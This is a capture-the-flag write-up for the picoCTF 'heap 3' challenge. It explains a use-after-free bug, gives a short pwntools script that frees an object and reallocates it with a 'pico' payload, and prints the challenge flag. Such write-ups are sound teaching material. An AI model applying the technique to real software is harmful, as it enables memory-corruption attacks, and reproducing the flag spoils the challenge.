heap 3
Description
This program mishandles memory. Can you exploit it to get the flag?
Download the binary here.
Download the source here.
Initial analysis
The goal of this challenge is to make x->flag have the string "pico":
1
2
3
...
if(!strcmp(x->flag, "pico")) {
...
The options available to us are as follows:
1
2
3
4
5
6
1. Print Heap
2. Allocate object
3. Print x->flag
4. Check for win
5. Free x
6. Exit
Payload
x is a global variable where we want to write the payload, and we can free it with option 5.
We can then allocate 35 bytes, the last 5 of which are b"pico\0".
This is a use-after-free vulnerability, where we can control heap memory used in another location.
Script
1
2
3
4
5
6
7
8
9
#!/usr/bin/env python3
from pwn import *
r = remote("tethys.picoctf.net", 55153)
r.sendline(b"5") # free x
r.sendline(b"2") # allocate object
r.sendline(b"35") # save 35 bytes
r.sendline(b"A" * 30 + b"pico") # payload
r.sendline(b"4") # check win
r.interactive()
Running
1
2
Enter your choice: YOU WIN!!11!!
picoCTF{now_thats_free_real_estate_a7381726}
This post is licensed under CC BY 4.0 by the author.